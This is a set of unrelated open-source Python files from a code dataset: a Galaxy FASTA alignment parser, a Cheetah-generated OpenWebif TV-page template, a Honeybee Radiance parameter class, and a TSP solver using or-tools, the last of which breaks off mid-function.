        # chrom falls back to the species name when src has no '.' separator
        attributes['chrom'] = temp[1] if len( temp ) == 2 else temp[0]
        region = region[1].split( ')', 1 )
        attributes['strand'] = region[0]
        region = region[1].lstrip( ':' ).split( '-' )
        attributes['start'] = int( region[0] )
        attributes['end'] = int( region[1] )
    except ( IndexError, ValueError ):
        # fields[0] is not a region coordinate; leave coordinates unset
        pass
    if len( fields ) > 2:
        for field in fields[1:-1]:
            prop = field.split( '=', 1 )
            if len( prop ) == 2:
                attributes[ prop[0] ] = prop[1]
    if len( fields ) > 1:
        attributes['__suffix__'] = fields[-1]
    return attributes
def iter_fasta_alignment( filename ):
    """Yield one list of fastaComponent records per alignment in a FASTA file.

    Alignments are separated by blank lines; each '>' header starts a new
    component and subsequent lines extend that component's sequence text.
    The file handle is now closed deterministically (``with``); the
    original never closed it.
    NOTE(review): the file is opened in 'rb' but processed with str
    literals -- under Python 3 this str/bytes mixing would need revisiting.
    """
    class fastaComponent:
        """One FASTA sequence: species name plus accumulating text."""
        def __init__( self, species, text = "" ):
            self.species = species
            self.text = text
        def extend( self, text ):
            self.text = self.text + text.replace( '\n', '' ).replace( '\r', '' ).strip()
    with open( filename, 'rb' ) as f:
        components = []
        while True:
            line = f.readline()
            if not line:
                # EOF: flush any trailing alignment
                if components:
                    yield components
                return
            line = line.strip()
            if not line:
                # blank line terminates the current alignment
                if components:
                    yield components
                    components = []
            elif line.startswith( '>' ):
                attributes = get_attributes_from_fasta_header( line )
                components.append( fastaComponent( attributes['species'] ) )
            elif components:
                components[-1].extend( line )
| mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/galaxy/tools/util/maf_utilities.py | Python | gpl-3.0 | 30,790 | [
"Galaxy"
] | ae3a1dba8632fca2df5e6576851fbf799af51f3b5644c90e0a4edf4408ada9ce |
#!/usr/bin/env python
##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
import builtins as builtin
except ImportError:
import __builtin__ as builtin
from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers
##################################################
## MODULE CONSTANTS
# Short aliases used by the generated respond() body.
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
# Generation metadata recorded by the Cheetah compiler (do not edit).
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1364979193.755666
__CHEETAH_genTimestamp__ = 'Wed Apr 3 17:53:13 2013'
__CHEETAH_src__ = '/home/fermi/Work/Model/tmsingle/openpli3.0/build-tmsingle/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-0.1+git1+279a2577c3bc6defebd4bf9e61a046dcf7f37c01-r0.72/git/plugin/controllers/views/ajax/tv.tmpl'
__CHEETAH_srcLastModified__ = 'Wed Apr 3 17:10:17 2013'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'
# Refuse to run templates compiled by an incompatible (older) Cheetah.
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
    raise AssertionError(
      'This template was compiled with Cheetah version'
      ' %s. Templates compiled before version %s must be recompiled.'%(
         __CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
class tv(Template):

    """Cheetah-generated template class for the OpenWebif 'ajax/tv' page.

    NOTE(review): this module is auto-generated by Cheetah from tv.tmpl --
    edit the template and regenerate rather than changing this code.
    """

    ##################################################
    ## CHEETAH GENERATED METHODS
    def __init__(self, *args, **KWs):
        # Filter the kwargs down to those the Cheetah runtime understands.
        super(tv, self).__init__(*args, **KWs)
        if not self._CHEETAH__instanceInitialized:
            cheetahKWArgs = {}
            allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
            for k,v in KWs.items():
                if k in allowedKWs: cheetahKWArgs[k] = v
            self._initCheetahInstance(**cheetahKWArgs)
    def respond(self, trans=None):
        ## CHEETAH: main method generated for this template
        # Renders the page markup into the transaction; returns the rendered
        # string when running with a dummy (buffering) transaction.
        if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
            trans = self.transaction # is None unless self.awake() was called
        if not trans:
            trans = DummyTransaction()
            _dummyTrans = True
        else: _dummyTrans = False
        write = trans.response().write
        SL = self._CHEETAH__searchList
        _filter = self._CHEETAH__currentFilter
        ########################################
        ## START - generated method body
        write(u'''<div id="content_main">
\t<div id="tvcontentmain">
\t<div id="toolbar-header">
\t\t<span id="toolbar">
\t\t\t<span id="tvbutton">
\t\t\t\t<input type="radio" id="tvbutton0" name="tvbutton" /><label for="tvbutton0">Current</label>
\t\t\t\t<input type="radio" id="tvbutton1" name="tvbutton" checked="checked" /><label for="tvbutton1">Bouquets</label>
\t\t\t\t<input type="radio" id="tvbutton2" name="tvbutton" /><label for="tvbutton2">Providers</label>
\t\t\t\t<input type="radio" id="tvbutton3" name="tvbutton" /><label for="tvbutton3">Satellites</label>
\t\t\t\t<input type="radio" id="tvbutton4" name="tvbutton" /><label for="tvbutton4">All Channels</label>
\t\t\t\t<input type="radio" id="tvbutton5" name="tvbutton" /><label for="tvbutton5">EPG</label>
\t\t\t</span>
\t\t</span>
\t</div>
\t
\t<div id="tvcontent"></div>
\t</div>
</div>
<script type="text/javascript">
\t$(\'#tvbutton0\').click(function(){
\t\t$("#tvcontent").html(loadspinner).load("ajax/current");
\t});
\t$(\'#tvbutton1\').click(function(){
\t\t$("#tvcontent").html(loadspinner).load("ajax/bouquets");
\t});
\t$(\'#tvbutton2\').click(function(){
\t\t$("#tvcontent").html(loadspinner).load("ajax/providers");
\t});
\t$(\'#tvbutton3\').click(function(){
\t\t$("#tvcontent").load("ajax/satellites");
\t});
\t$(\'#tvbutton4\').click(function(){
\t\t$("#tvcontent").html(loadspinner).load("ajax/channels");
\t});
\t$(\'#tvbutton5\').click(function(){
\t\t$("#tvcontent").html(loadspinner).load(\'ajax/multiepg\');
\t});
\t
\t$( "#tvbutton" ).buttonset();
\t
\t$(document).ready(function() {
\t\t$("#tvcontent").load("ajax/bouquets");
\t});
</script>
''')
        ########################################
        ## END - generated method body
        return _dummyTrans and trans.response().getvalue() or ""
    ##################################################
    ## CHEETAH GENERATED ATTRIBUTES
    _CHEETAH__instanceInitialized = False
    _CHEETAH_version = __CHEETAH_version__
    _CHEETAH_versionTuple = __CHEETAH_versionTuple__
    _CHEETAH_genTime = __CHEETAH_genTime__
    _CHEETAH_genTimestamp = __CHEETAH_genTimestamp__
    _CHEETAH_src = __CHEETAH_src__
    _CHEETAH_srcLastModified = __CHEETAH_srcLastModified__
    _mainCheetahMethod_for_tv= 'respond'
## END CLASS DEFINITION
# Attach Cheetah's runtime plumbing methods to the generated class on import.
if not hasattr(tv, '_initCheetahAttributes'):
    templateAPIClass = getattr(tv, '_CHEETAH_templateClass', Template)
    templateAPIClass._addCheetahPlumbingCodeToClass(tv)
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
# Allow rendering this template directly from the command line (debugging aid).
if __name__ == '__main__':
    from Cheetah.TemplateCmdLineIface import CmdLineIface
    CmdLineIface(templateObj=tv()).run()
| pli3/Openwebif | plugin/controllers/views/ajax/tv.py | Python | gpl-2.0 | 5,832 | [
"VisIt"
] | 9ccbe81b333269f64084a71e54c7e4b0354411b8a0dcc273ea8c44357ace9459 |
"""Radiance Parameters Base class with methods to add descriptor type parameters."""
from ._parametersbase import RadianceParameters
from ..datatype import RadiancePath, RadianceNumber, RadianceBoolFlag, \
RadianceTuple, RadianceValue
# TODO: Add __new__ to create a new class for each instance. After that the
# new paramters will be added only and only to that instance of the class since
# that is the only instance that uses that unique copy of the class.
# for now I'm using setattr(self.__class__, name, RadianceNumber(name,...))
# to minimize the damage (e.g. make sure the parameter won't be added to
# RadianceParameters). If user make a subclass from this class then it should
# work as expected.
class AdvancedRadianceParameters(RadianceParameters):
    """Radiance Parameters Base class with methods to add descriptor type parameters.

    Subclasses call the add* methods to attach descriptor-backed Radiance
    options (numbers, tuples, flags, paths, values) to the class at runtime.

    Usage:
        class CustomParameters(AdvancedRadianceParameters):
            pass
        rp = CustomParameters()
        rp.addRadianceNumber('ab', 'ambient bounces')
        rp.ab = 20
        rp.addRadianceValue('o', 'o f', isJoined=True)
        rp.o = f
        rp.addRadianceTuple('c', 'color', numType=int)
        rp.c = (0, 0, 254)
        rp.addRadianceBoolFlag('I', 'irradiance switch', isDualSign=True)
        rp.I = True
        print rp.toRadString()
        > -ab 20 -of -c 0 0 254 +I
    """
    def __init__(self):
        """Init parameters."""
        RadianceParameters.__init__(self)
    def __setattribute(self, name, value, attributeName=None):
        # Attach descriptor *value* to the class under attributeName (or name)
        # and register it as a default parameter.  The class is temporarily
        # unfrozen because the parameters class forbids ad-hoc attributes.
        _attrname = attributeName if attributeName is not None else name
        # unfreeze the class so the new attribute can be added
        self.tryToUnfreeze()
        try:
            setattr(self.__class__, _attrname, value)
            # add name of the attribute to default parameters
            self.addDefaultParameterName(_attrname, name)
        except Exception as e:
            if hasattr(self.__class__, _attrname):
                self.addDefaultParameterName(_attrname, name)
            # this is useful for cases that the environment caches the classes
            # Grasshopper and Dynamo included
            else:
                # NOTE(review): re-wrapping as Exception(e) loses the original
                # traceback and type; a bare `raise` would preserve both.
                raise Exception(e)
        finally:
            self.freeze()
    def addRadianceNumber(self, name, descriptiveName=None, validRange=None,
                          acceptedInputs=None, numType=None, checkPositive=False,
                          attributeName=None):
        """Add a radiance number to parameters.
        Attributes:
            name: Required for all cases. Name of the flag, like 'ab' for '-ab 5'
                in rtrace etc. Note that some of the radiance flags are actually
                keywords in python. For example -or in rcollate or -as in rtrace.
                In such cases the name of the flag should be specified as orX or
                asX respectively. Refer the rcollate definition for an example.
            descriptiveName: This is the human-readable name of the flag. For
                example 'ambient divisions' for 'ab', 'view file' for 'vf' etc.
                These descriptions are usually available in the manual pages of
                Radiance. Although this is an optional input, for the purposes of
                debugging and readability, it is strongly suggested that this input
                be specified for all instances.
            acceptedInputs:Optional. List of inputs that are permissible for a
                particular command option. For example, the -h flag in rcollate
                only accepts 'i' or 'o' as options. So, in cases where permissible
                inputs are known it is recommended that this input be specified.If
                the user-specified input doesn't exist in _acceptedInputs then a
                value error will be raised.
            validRange: Optional. The valid range for several prominent radiance
                parameters is between 0 and 1. There are likely to be other
                parameters with similar valid ranges. If _validRange is specified,
                a warning will be issued in case the provided input is not within
                that range.
            checkPositive: Optional. Check if the number should be greater than
                or equal to zero.
            numType: Optional. Acceptable inputs are float or int. If specified, the
                __set__ method will ensure that the value is stored in that type.
                Also, if the number changes (for example from 4.212 to 4 due to int
                being specified as _type_), then a warning will be issued.
            attributeName: Optional. A string that will be used as the attribute
                name that will be added to parameters class. If None name will be
                used instead.
        """
        # set the new attribute based on inputs
        self.__setattribute(name,
                            RadianceNumber(name, descriptiveName, validRange,
                                           acceptedInputs, numType,
                                           checkPositive),
                            attributeName
                            )
    def addRadianceValue(self, name, descriptiveName=None, acceptedInputs=None,
                         isJoined=False, attributeName=None):
        """
        Add a radiance string value.
        Attributes:
            name: Required for all cases. Name of the flag, like 'ab' for '-ab 5'
                in rtrace etc. Note that some of the radiance flags are actually
                keywords in python. For example -or in rcollate or -as in rtrace.
                In such cases the name of the flag should be specified as orX or
                asX respectively. Refer the rcollate definition for an example.
            descriptiveName: This is the human-readable name of the flag. For
                example 'ambient divisions' for 'ab', 'view file' for 'vf' etc.
                These descriptions are usually available in the manual pages of
                Radiance. Although this is an optional input, for the purposes of
                debugging and readability, it is strongly suggested that this input
                be specified for all instances.
            acceptedInputs:Optional. List of inputs that are permissible for a
                particular command option. For example, the -h flag in rcollate
                only accepts 'i' or 'o' as options. So, in cases where permissible
                inputs are known it is recommended that this input be specified.If
                the user-specified input doesn't exist in _acceptedInputs then a
                value error will be raised.
            isJoined: Set to True if the Boolean should be returned as a joined
                output (i.e. -of, -od) (Default: False)
            attributeName: Optional. A string that will be used as the attribute
                name that will be added to parameters class. If None name will be
                used instead.
        """
        # set the new attribute based on inputs
        self.__setattribute(name,
                            RadianceValue(name, descriptiveName, acceptedInputs,
                                          None, isJoined),
                            attributeName
                            )
    def addRadiancePath(self, name, descriptiveName=None, relativePath=None,
                        checkExists=False, extension=None, attributeName=None):
        """
        Add a radiance file path.
        Attributes:
            name: Required for all cases. Name of the flag, like 'ab' for '-ab 5'
                in rtrace etc. Note that some of the radiance flags are actually
                keywords in python. For example -or in rcollate or -as in rtrace.
                In such cases the name of the flag should be specified as orX or
                asX respectively. Refer the rcollate definition for an example.
            descriptiveName: This is the human-readable name of the flag. For
                example 'ambient divisions' for 'ab', 'view file' for 'vf' etc.
                These descriptions are usually available in the manual pages of
                Radiance. Although this is an optional input, for the purposes of
                debugging and readability, it is strongly suggested that this input
                be specified for all instances.
            relativePath: Optional. Start folder for relative path. Default is None
                which returns absolute path.
            checkExists: Optional. Check if the file exists. Useful in the case of
                input files such as epw files etc. where it is essential for those
                files to exist before the command executes.
            extension: Optional. Test the extension of the file.
            attributeName: Optional. A string that will be used as the attribute
                name that will be added to parameters class. If None name will be
                used instead.
        """
        # set the new attribute based on inputs
        self.__setattribute(name,
                            RadiancePath(name, descriptiveName, relativePath,
                                         checkExists, extension),
                            attributeName
                            )
    def addRadianceBoolFlag(self, name, descriptiveName=None, isDualSign=False,
                            attributeName=None):
        """Add a boolean value to parameters.
        Attributes:
            name: Required for all cases. Name of the flag, like 'ab' for '-ab 5'
                in rtrace etc. Note that some of the radiance flags are actually
                keywords in python. For example -or in rcollate or -as in rtrace.
                In such cases the name of the flag should be specified as orX or
                asX respectively. Refer the rcollate definition for an example.
            descriptiveName: This is the human-readable name of the flag. For
                example 'ambient divisions' for 'ab', 'view file' for 'vf' etc.
                These descriptions are usually available in the manual pages of
                Radiance. Although this is an optional input, for the purposes of
                debugging and readability, it is strongly suggested that this input
                be specified for all instances.
            isDualSign: Set to True if the Boolean should return +/- value.
                (i.e. +I/-I) (Default: False)
            attributeName: Optional. A string that will be used as the attribute
                name that will be added to parameters class. If None name will be
                used instead.
        """
        # set the new attribute based on inputs
        self.__setattribute(name,
                            RadianceBoolFlag(name, descriptiveName, None,
                                             isDualSign),
                            attributeName
                            )
    def addRadianceTuple(self, name, descriptiveName=None, validRange=None,
                         acceptedInputs=None, tupleSize=None, numType=None,
                         attributeName=None):
        """Add a radiance numeric tuple e.g (0.5,0.3,0.2).
        Attributes:
            name: Required for all cases. Name of the flag, like 'ab' for '-ab 5'
                in rtrace etc. Note that some of the radiance flags are actually
                keywords in python. For example -or in rcollate or -as in rtrace.
                In such cases the name of the flag should be specified as orX or
                asX respectively. Refer the rcollate definition for an example.
            descriptiveName: This is the human-readable name of the flag. For
                example 'ambient divisions' for 'ab', 'view file' for 'vf' etc.
                These descriptions are usually available in the manual pages of
                Radiance. Although this is an optional input, for the purposes of
                debugging and readability, it is strongly suggested that this input
                be specified for all instances.
            acceptedInputs:Optional. List of inputs that are permissible for a
                particular command option. For example, the -h flag in rcollate
                only accepts 'i' or 'o' as options. So, in cases where permissible
                inputs are known it is recommended that this input be specified.If
                the user-specified input doesn't exist in _acceptedInputs then a
                value error will be raised.
            validRange: Optional. The valid range for several prominent radiance
                parameters is between 0 and 1. There are likely to be other
                parameters with similar valid ranges. If _validRange is specified,
                a warning will be issued in case the provided input is not within
                that range.
            tupleSize: Optional. Specify the number of inputs that are expected.
            numType: Optional. Acceptable inputs are float or int. If specified, the
                __set__ method will ensure that the value is stored in that type.
            attributeName: Optional. A string that will be used as the attribute
                name that will be added to parameters class. If None name will be
                used instead.
        """
        # set the new attribute based on inputs
        self.__setattribute(name,
                            RadianceTuple(name, descriptiveName, validRange,
                                          acceptedInputs, tupleSize, numType),
                            attributeName
                            )
| antonszilasi/honeybeex | honeybeex/honeybee/radiance/parameters/_advancedparametersbase.py | Python | gpl-3.0 | 13,739 | [
"EPW"
] | 485288995d5d9ae0ca5bf79b54a610796ba253fd0668c9a8ea49d1cd225ba55f |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import random
from __builtin__ import enumerate
import pulp
# !/usr/bin/python
# -*- coding: utf-8 -*-
import math
from collections import namedtuple
from collections import deque
from ortools.constraint_solver import pywrapcp
from ortools.linear_solver import pywraplp
import gflags
FLAGS = gflags.FLAGS
gflags.DEFINE_boolean('light_propagation', False, 'Use light propagation')
# Lightweight geometric records shared by all the solvers below.
Point = namedtuple("Point", ['id', 'x', 'y'])
Segment = namedtuple("Segment", ['f', 't', 'id'])
Rect = namedtuple("Rect", ['x0', 'y0', 'x1', 'y1'])
def length(point1, point2):
    """Euclidean distance between two points (objects with .x and .y)."""
    dx = point1.x - point2.x
    dy = point1.y - point2.y
    return math.sqrt(dx ** 2 + dy ** 2)
def tour_length(node_count, points, sol):
    """Total length of the closed tour visiting *points* in the order *sol*."""
    total = length(points[sol[-1]], points[sol[0]])
    for i in range(node_count - 1):
        total += length(points[sol[i]], points[sol[i + 1]])
    return total
class NotRandomMatrix(object):
    """Fully precomputed pairwise distance matrix keyed by point ids."""
    def __init__(self, points):
        self.matrix = {}
        for origin in points:
            row = {}
            for target in points:
                row[target.id] = 0 if origin == target else length(origin, target)
            self.matrix[origin.id] = row
    def Distance(self, from_node, to_node):
        """Precomputed distance between two node ids."""
        return self.matrix[from_node][to_node]
class DistanceMatrix:
    """Pairwise Euclidean point distances, scaled by 100, computed on demand.

    BUGFIX: ``_distanceP`` was defined without ``self`` while being called
    as ``self._distanceP(p0, p1)``, so every call raised TypeError.
    """
    def __init__(self, points):
        self._points = points
        # The triangular cache for _distanceBuffered was left disabled here;
        # that method is dead code (self._distances is never created).
    def _distance(self, i, j):
        # Distance between the points at indices i and j.
        return self._distanceP(self._points[i], self._points[j])
    def _distanceP(self, p0, p1):
        # Scaled (x100) Euclidean distance between two point records.
        return math.sqrt((p0.x - p1.x) ** 2 + (p0.y - p1.y) ** 2) * 100
    def _distanceBuffered(self, i, j):
        # NOTE(review): unused and currently broken -- relies on
        # self._distances which __init__ never initialises.
        if (j > i):
            i, j = j, i
        k = (i * (i + 1) / 2) + j
        l = self._distances[k]
        if l == 65535:
            l = self._distance(i, j)
            self._distances[k] = l
        return l
    def get(self, i, j):
        """Scaled distance between the points at indices i and j."""
        return self._distance(i, j)
    def obj(self, solution):
        """Tour objective: sum of segment lengths (uses module-level segmentize)."""
        return sum([self._distanceP(s[0], s[1]) for s in segmentize(self._points)])
def make_clusters(points):
    """Partition *points* into (left, body, right) geographic clusters.

    Points in the vertical band 15000 < y < 590000 whose x is far left
    (< 55000) or far right (> 620000) go to the side lists; everything
    else is bucketed into one of 21 horizontal strips of height 30000.
    """
    body = [[] for _ in range(21)]
    left = []
    right = []
    for point in points:
        in_band = 15000 < point.y < 590000
        if in_band and (point.x < 55000 or point.x > 620000):
            side = left if point.x < 55000 else right
            side.append(point)
        else:
            body[int(point.y / 30000)].append(point)
    return (left, body, right)
def connection_cost(from_, to, cross, distances):
    """Net tour-length change from breaking segments *from_* and *to*
    and reconnecting their endpoints (optionally crossed)."""
    removed = distances.get(from_[0], from_[1]) + distances.get(to[0], to[1])
    head = from_[1] if cross else from_[0]
    tail = from_[0] if cross else from_[1]
    added = distances.get(head, to[0]) + distances.get(tail, to[1])
    return added - removed
def shift_and_reverse(what, shift, reverse):
    """Rotate *what* so the element at index *shift* becomes the last one;
    optionally reverse the result.  Returns a deque."""
    rotated = deque(what)
    rotated.rotate(len(what) - shift - 1)
    if reverse:
        rotated.reverse()
    return rotated
def containing_rect(points):
    """Axis-aligned bounding Rect of *points*, padded by 60000 horizontally
    and 1000 vertically."""
    min_x = max_x = points[0].x
    min_y = max_y = points[0].y
    for p in points[1:]:
        min_x = min(min_x, p.x)
        min_y = min(min_y, p.y)
        max_x = max(max_x, p.x)
        max_y = max(max_y, p.y)
    pad_y = 1000
    pad_x = 60000
    return Rect(min_x - pad_x, min_y - pad_y, max_x + pad_x, max_y + pad_y)
def segmentize(points):
    """Consecutive Segments over *points*, plus the closing segment back to
    the start (whose id equals len(points), matching the original scheme)."""
    count = len(points)
    segments = [Segment(points[i], points[i + 1], i) for i in range(count - 1)]
    segments.append(Segment(points[-1], points[0], count))
    return segments
def in_rect(r, p):
    """True if point *p* lies inside rect *r* (boundaries inclusive)."""
    return (r.x0 <= p.x <= r.x1) and (r.y0 <= p.y <= r.y1)
def choose_with_rect(r, segments, points):
    """Segments with at least one endpoint inside *r*; the rect is grown
    vertically by 1000 on each side until the selection is non-empty."""
    result = []
    while not result:
        result = [s for s in segments
                  if in_rect(r, points[s[0]]) or in_rect(r, points[s[1]])]
        r = Rect(r.x0, r.y0 - 1000, r.x1, r.y1 + 1000)
    print(len(result))
    return result
def insert_solution(solution, partial, distances):
    """Splice the *partial* tour into *solution* at the cheapest junction.

    Mutates *solution* (a list of point indices) in place.  An empty
    solution is simply replaced by *partial*.  Otherwise the pair of
    segments -- one from each tour -- whose reconnection adds the least
    length is found, and *partial* is rotated (and possibly reversed) so
    it slots in at that point.
    """
    if len(solution) == 0:
        solution.extend(partial)
        return
    points = distances._points
    # Only consider solution segments near the partial tour's bounding box.
    rect = containing_rect([points[i] for i in partial])
    print (rect)
    segment_solution = segmentize(solution)
    filtered_solution = choose_with_rect(rect, segment_solution, points)
    segment_partial = segmentize(partial)
    best_solution = segment_solution[0].id
    best_partial = segment_partial[0].id
    best_cross = False
    best_cost = connection_cost(segment_solution[0], segment_partial[0], False, distances)
    for s in filtered_solution:
        for p in segment_partial:
            for cross in (False, True):
                cost = connection_cost(s, p, cross, distances)
                if cost < best_cost:
                    best_solution = s.id
                    best_partial = p.id
                    best_cross = cross
                    best_cost = cost
    solution[best_solution:best_solution] = shift_and_reverse(partial, best_partial, not best_cross)
def solve_and_save(cluster, filename):
    """Solve the TSP for one cluster and write the visited point ids,
    one per line, to *filename*.  Empty clusters are skipped."""
    l = len(cluster)
    #print filename, l
    if l > 0:
        (objective, solution) = solve_routing(cluster, l)
        f = open(filename, 'w')
        for i in solution:
            f.write(str(cluster[i].id) + "\n")
        f.close()
def clusterize_and_save(points):
    """Split *points* into left/body/right clusters and solve each one,
    persisting the tours under the clusters/ directory."""
    (left, body, right) = make_clusters(points)
    solve_and_save(left, "clusters/left")
    solve_and_save(right, "clusters/right")
    _id = 0
    for cluster in body:
        solve_and_save(cluster, "clusters/body_%d" % _id)
        _id += 1
def read_partial(name):
    """Read a saved partial tour: one integer node index per line.

    Uses ``with`` so the file handle is closed deterministically; the
    original iterated an unclosed ``open(name)``.
    """
    #print name
    with open(name) as handle:
        return [int(line.strip()) for line in handle]
def solve_clustered(points, nodeCount):
    """Assemble a full tour by merging the per-cluster tours previously
    written to the clusters/ directory (see clusterize_and_save).

    Returns (objective_value, solution) where solution is a list of
    point indices.
    """
    # clusterize_and_save(points)
    dm = DistanceMatrix(points)
    solution = []
    for i in range(21):
        partial = read_partial("clusters/body_%d" % i)
        insert_solution(solution, partial, dm)
    insert_solution(solution, read_partial("clusters/left"), dm)
    insert_solution(solution, read_partial("clusters/right"), dm)
    return (dm.obj(solution), solution)
def my_solver(points, nodeCount):
    """Solve the TSP over *points* with or-tools' routing solver.

    Returns the tour as a list of node indices starting at node 0.
    NOTE(review): if the solver finds no assignment, ``solution`` is never
    bound and the final ``return solution`` raises NameError.
    """
    def Distance(i, j):
        # Euclidean distance callback used as the arc cost.
        point1 = points[i]
        point2 = points[j]
        return math.sqrt((point1.x - point2.x) ** 2 + (point1.y - point2.y) ** 2)
    # Set a global parameter.
    param = pywrapcp.RoutingParameters()
    param.use_light_propagation = FLAGS.light_propagation
    pywrapcp.RoutingModel.SetGlobalParameters(param)
    # TSP of size FLAGS.tsp_size
    # Second argument = 1 to build a single tour (it's a TSP).
    # Nodes are indexed from 0 to FLAGS_tsp_size - 1, by default the start of
    # the route is node 0.
    routing = pywrapcp.RoutingModel(nodeCount, 1)
    parameters = pywrapcp.RoutingSearchParameters()
    # Setting first solution heuristic (cheapest addition).
    parameters.first_solution = 'PathCheapestArc'
    # Disabling Large Neighborhood Search, comment out to activate it.
    # parameters.no_lns = True
    parameters.no_tsp = False
    # Setting the cost function.
    # Put a callback to the distance accessor here. The callback takes two
    # arguments (the from and to node inidices) and returns the distance between
    # these nodes.
    routing.SetArcCostEvaluatorOfAllVehicles(Distance)
    # Forbid node connections (randomly).
    # rand = random.Random()
    # rand.seed(FLAGS.tsp_random_seed)
    # forbidden_connections = 0
    # while forbidden_connections < FLAGS.tsp_random_forbidden_connections:
    # from_node = rand.randrange(FLAGS.tsp_size - 1)
    # to_node = rand.randrange(FLAGS.tsp_size - 1) + 1
    # if routing.NextVar(from_node).Contains(to_node):
    # print 'Forbidding connection ' + str(from_node) + ' -> ' + str(to_node)
    # routing.NextVar(from_node).RemoveValue(to_node)
    # forbidden_connections += 1
    # Solve, returns a solution if any.
    assignment = routing.SolveWithParameters(parameters, None)
    if assignment:
        # Solution cost.
        #print assignment.ObjectiveValue()
        # Inspect solution.
        # Only one route here; otherwise iterate from 0 to routing.vehicles() - 1
        route_number = 0
        node = routing.Start(route_number)
        route = ''
        solution = []
        while not routing.IsEnd(node):
            route += str(node) + ' -> '
            solution.append(int(node))
            node = assignment.Value(routing.NextVar(node))
        route += '0'
        #print route
        #print solution
    else:
        print ('No solution found.')
    return solution
def solve_routing(points, nodeCount):
    """Solve a cluster's TSP with or-tools (guided local search).

    Intended to return (objective_value, solution).
    NOTE(review): the extraction loop below is ``while True`` and never
    checks routing.IsEnd, so it does not terminate normally and the
    return statement is unreachable as written -- confirm against the
    or-tools API before relying on this function.
    NOTE(review): ``distanceMatrix`` is built but never used.
    """
    distanceMatrix = NotRandomMatrix(points)
    routing = pywrapcp.RoutingModel(nodeCount, 1)
    routing.UpdateTimeLimit(5 * 6)
    parameters = pywrapcp.RoutingSearchParameters()
    # Setting first solution heuristic (cheapest addition).
    parameters.first_solution = 'PathCheapestArc'
    # parameters.solution_limit = 10
    parameters.guided_local_search = True
    #parameters.simulated_annealing = True
    #parameters.tabu_search = True
    parameters.no_lns = True
    def length_idx(i, j):
        # Euclidean distance between nodes i and j, used as the arc cost.
        point1 = points[i]
        point2 = points[j]
        return math.sqrt((point1.x - point2.x) ** 2 + (point1.y - point2.y) ** 2)
    cost = length_idx
    print("setting dist")
    routing.SetArcCostEvaluatorOfAllVehicles(cost)
    #search_log = routing.solver().SearchLog(10000000, routing.CostVar())
    #routing.AddSearchMonitor(search_log)
    print("computing")
    assignment = routing.SolveWithParameters(parameters, None)
    solution = []
    print(routing)
    node = routing.Start(0)
    while True:
        solution.append(node)
        print (solution)
        node = assignment.Value(routing.NextVar(node))
    return (assignment.ObjectiveValue(), solution)
def solve_mip(points, nodeCount):
    """Solve the TSP as a MIP (MTZ subtour-elimination formulation) via CBC.

    Returns (objective_value, solution).
    NOTE(review): SetTimeLimit takes milliseconds in or-tools, so the
    limit of 1 is almost certainly unintended; the subsequent assert on
    OPTIMAL will then fail for non-trivial instances -- confirm.
    """
    distanceMatrix = DistanceMatrix(points)
    solver = pywraplp.Solver('CP is fun!', pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING);
    # GLPK_MIXED_INTEGER_PROGRAMMING
    # CBC_MIXED_INTEGER_PROGRAMMING
    # SCIP_MIXED_INTEGER_PROGRAMMING
    print ("creating variables")
    nodes = range(nodeCount)
    # x[i][j] == 1 iff the tour travels directly from node i to node j.
    x = [[solver.BoolVar('x%d_%d' % (i, j)) for j in nodes] for i in nodes]
    print ("enter/exit just once")
    for i in nodes:
        solver.Add(x[i][i] == 0)
        row = x[i]
        solver.Add(solver.Sum(row) == 1)
        column = [x[j][i] for j in nodes]
        solver.Add(solver.Sum(column) == 1)
    # u[i]: node position in the tour (MTZ variables); u[0] anchored to 0.
    u = [solver.IntVar(0, nodeCount - 1, 'u%d' % i) for i in nodes]
    solver.Add(u[0] == 0)
    objective = solver.Objective()
    for i in nodes:
        for j in nodes:
            if (i != j):
                objective.SetCoefficient(x[i][j], distanceMatrix.get(i, j))
                # MTZ subtour-elimination constraint.
                solver.Add(u[i] - u[j] + nodeCount * x[i][j] <= (nodeCount - 1))
    #
    # solution and search
    #
    print ("starting search")
    solver.SetTimeLimit(1)
    result_status = solver.Solve()
    assert result_status == pywraplp.Solver.OPTIMAL
    print ("WallTime:", solver.WallTime())
    print ([[x[i][j].SolutionValue() for j in nodes] for i in nodes])
    # Walk the successor matrix starting at node 0 to recover the tour.
    solution = []
    current = 0
    next = -1
    while (next != 0):
        solution.append(current)
        for i in nodes:
            if x[current][i].SolutionValue() > 0:
                next = i
                break
        current = next
    return (objective.Value(), solution)
def solve_it(input_data):
    """Parse a TSP instance ('n' then one 'x y' pair per line), solve it
    with my_solver, and format 'objective 0\\nidx idx ...' as output."""
    # Modify this code to run your optimization algorithm
    print ("reading file")
    # parse the input
    lines = input_data.split('\n')
    nodeCount = int(lines[0])
    points = []
    print ("converting")
    _id = 0
    for line in lines[1:-1]:
        parts = line.split()
        p = Point(_id, float(parts[0]), float(parts[1]))
        points.append(p)
        _id += 1
    # build a trivial solution
    # visit the nodes in the order they appear in the file
    print ("calling solver")
    solution = my_solver(points, nodeCount)
    obj = tour_length(nodeCount, points, solution)
    print (obj)
    # prepare the solution in the specified output format
    output_data = str(obj) + ' ' + str(0) + '\n'
